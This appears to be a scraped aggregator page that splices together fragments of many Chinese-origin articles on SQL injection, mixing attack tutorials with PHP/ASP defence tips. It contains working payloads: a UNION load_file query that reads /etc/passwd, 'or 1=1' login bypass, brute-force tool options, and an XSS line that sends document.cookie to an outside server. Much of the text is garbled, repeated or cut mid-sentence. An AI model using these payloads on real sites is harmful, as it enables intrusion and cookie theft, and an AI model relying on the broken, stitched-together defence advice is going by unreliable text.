Website nightmare-SQL Injection
SQL Injection modifies the website database through the web page. It can directly add users with administrator permissions to the database to ultimately obtain system administrator permissions. Ha
ASCII of the/etc/passwd string: each character in the string cyclically outputs ord (...)In addition, you can also use the hexadecimal string: each character in the string cyclically outputs dechex (ord (...))/Articles. php? Id = 0 union select 1, 2, load_file (0x2f6574632f706173737764)Here, we only talk about several attack methods of numeric parameters, which are at the tip of the iceberg. For attack methods such as string parameters, refer to the link below.Defense:Some software similar to
the following options:
(A) ttemptSQLPingandAutoQuickBruteForce: use this option to try to scan an IP address, use the same syntax as nmap, and then use a prepared dictionary file containing 50 common passwords for quick brute-force cracking
(M) assscananddictionarybrute: provides a password dictionary for brute force cracking on multiple hosts. Fast-Track comes with a very good password dictionary, which is stored in bin/dict/wordlist.txt.
S) ingletarget: brute-force cracking against a single t
is simple:1. Search for websites with query strings (for example, query URLs with "id =" in the URL)2. Send a request to these websites that are determined to be dynamic, change the id = Statement and put an extra single quotation mark to try to cancel the SQL statement (for example, such as ID = 6 ')3. Analyze the returned responses and search for words such as "SQL" and "query". This often indicates that
Author: The Demon of Destruction article Source: Shadow Eagle Security Network
Just beginning to learn SQL injection intrusion, there are written wrong and bad place I hope you shige, sister a lot of guidance.
In a supply and demand information released by the website test a bit, the page Http://www.xxx.com/new/new.asp?id=49
I did the following tests: (1) Http:
I made a website for others last week and accidentally found many vulnerabilities in my work. In just 20 seconds, I was able to use SQL injection. I checked some information about SQL injection and hoped to share it with new users. experts laughed!
The general idea of
What is SQL injection?
Many web site programs in the writing, the user does not have to judge the legality of input data, so that the application has security problems. Users can submit a database query code (usually in the browser address bar, through the normal WWW port access), according to the results returned by the program to obtain some of the data, which is called
What is SQL injection?
Many web site programs in the writing, the user does not have to judge the legality of input data, so that the application has security problems. Users can submit a database query code (usually in the browser address bar, through the normal WWW port access), according to the results returned by the program to obtain some of the data, which is called
variable option if we cannot register it as a global variable:
The code is as follows:
Register_globals = Off
Of course, if this is set, a reasonable way should be used to obtain the corresponding variable, such as getting the variable var submitted by GET,
You need to use $ _ GET ['var'] to obtain it. This php programmer should pay attention to it.
(9) enable magic_quotes_gpc to prevent SQL
website configuration file and set the debug flag:
In the global configuration file:Define ("DEBUG_MODE", 0); // 1: debug mode; 0: RELEASE MODE
// In the call script:$ T_strSQL = "SELECT a from B ....";If (mysql_query ($ t_strSQL )){// Correct Handling}Else{If (DEBUG_MODE)Echo "error! SQL statement: $ t_strSQL error message ". mysql_query ();Exit;}
Run the convert and type checks on the submitted
Haohappy
http://blog.csdn.net/Haohappy2004
SQL injection attacks are the most common means by which hackers attack websites. If your site doesn't use strict user input validation, it's very susceptible to SQL injection attacks. SQL inje
Basic SQL Injection principle:
Get the contents of other tables (for example, user passwords) from the Union All Union queryDefense principle:1. Through the above configuration filter the basic URL of the injection keyword;2. Of course, the user password in the database is encrypted to store;3. PHP program to filter two times, filter get and post variables in th
the HTML webpage from the website to the local hard disk and modify its hidden part.Such:
Hod = post>If you are lucky, it is estimated that you can log on successfully without the account and password.
3.1 why is it 'or 1 = 1?Let's take a look at the importance of using 'or 1 = 1 -- in other examples. This method is different from the normal login method.You can obtain some special information that cannot be obtained during normal login. Use the ASP
On the ThinkPHP official website, an announcement pointed out that the SQL injection vulnerability exists in ThinkPHP 3.1.3 and earlier versions. The vulnerability exists in the ThinkPHP/Lib/Core/Model. class. php file.Explanation of the "SQL Injection prevention" approach (
An excellent PHP programmer must be able to write code smoothly and keep the program in a secure environment. Today, we will explain how PHP can prevent SQL injection.
Speaking of website security, you have to mention SQL Injection. If you have used ASP, you must have a deep
, such as release time or service purchase, which can cause a loophole in the vacuum period, this vacuum period will require temporary protection through the corresponding firewall. But in fact, the actual hacking cases are often inseparable from the mistakes of the developer or DBA.
In order to effectively prevent these problems, it is recommended that end users take the following actions:
(1) The use of vulnerability scanning Tool to find
Chinese garbled charactersOField. value = ";OField. className = "errInfo ";OField. focus ();Return false;}Add the following method to the input text box that requires anti-injection:TxtName. Attributes. Add ("onblur", "AntiSqlValid (this)"); // prevents SQL script injectionAnti-SQL injection on backend servers1. check whether g
Fully block SQL injection attacks in PHP 3. read fully block SQL injection attacks 3 in PHP, 1. to create a security abstraction layer, we do not recommend that you manually apply the technology described above to each user input instance. Instead, we strongly recommend that you create an abstraction layer for this. A
Dreamweaver + ASP Visual Programming threshold is very low, it is easy for beginners to get on the road. In a short period of time, new users often have been able to compile dynamic websites that seem to be perfect. In terms of functions, the experts can do the same, and the new users can do the same. Is there no difference between a novice and a veteran? The difference is big, but it is difficult for outsiders to see it at a glance. The friendliness, running performance, and
= "http: // myserver/cookie. php" + document. cookie.Or if you have space to store links to custom content, you can enter:Javascript: location. href = "http: // myserver/cookie. php" + document. cookieThis will intercept the cookie of the user accessing our data. This can be used anywhere, not just on the data. It is just an example.
Sometimes a site will display your UserAgent and Referer... now let's try some XSS at the DOS prompt or in the command line window,Telnet example.comGET/page/topla
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.